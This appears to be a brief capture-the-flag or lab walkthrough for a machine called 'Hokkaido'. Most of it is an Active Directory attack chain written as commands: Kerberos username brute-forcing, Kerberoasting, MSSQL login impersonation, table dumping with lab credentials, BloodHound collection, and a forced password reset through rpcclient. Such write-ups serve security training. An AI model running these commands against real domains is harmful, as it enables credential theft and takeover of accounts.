Hokkaido

Using kerbrute for bruteforcing usernames:

kerbrute userenum --dc 192.168.212.40 -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade

Now we can try kerberoasting with this account:

GetUserSPNs.py hokkaido-aerospace.com/info:info -request
mssqlclient.py -windows-auth -dc-ip 192.168.212.40 hokkaido-aerospace.com/discovery:'Start123!'@192.168.212.40

Now checking for impersonation:

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

Now to impersonate:

EXECUTE AS LOGIN = 'hrappdb-reader' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')

Now checking:

SELECT SYSTEM_USER
SELECT name FROM master.dbo.sysdatabases
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
select * from sysauth;

Now with the creds we can run bloodhound:

nxc ldap 192.168.212.40 -u hrapp-service -p 'Untimed$Runny' --bloodhound --collection All -ns 192.168.212.40
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
rpcclient //192.168.94.135 -U hokkaido-aerospace.com/hazel.green%haze1988c
rpcclient $> setuserinfo2 MOLLY.SMITH 23 'Start123!'

Last updated